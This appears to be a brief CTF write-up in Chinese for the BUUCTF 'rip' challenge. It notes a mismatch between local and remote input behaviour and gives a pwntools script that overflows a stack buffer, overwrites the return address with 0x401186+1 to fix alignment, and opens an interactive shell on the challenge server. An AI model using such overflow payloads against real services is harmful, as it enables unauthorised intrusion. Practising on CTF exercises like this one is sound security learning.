BUUCTF | test_your_nc
BUUCTF | rip
从IDA和远程的链接可以看出问题,IDA(或者说在本地跑时,先接收一句话,后输入点),而远程的输入点提前了,所以写脚本时要注意
问题解决:ret+1
参考
http://blog.eonew.cn/archives/958
from pwn import *
#context.log_level='debug'
p = remote('node3.buuoj.cn', 28164)
#p = process('/pwn1')
payload = 'a' * (0xf + 8) + p64(0x401186+1)
p.sendline(payload)
p.interactive()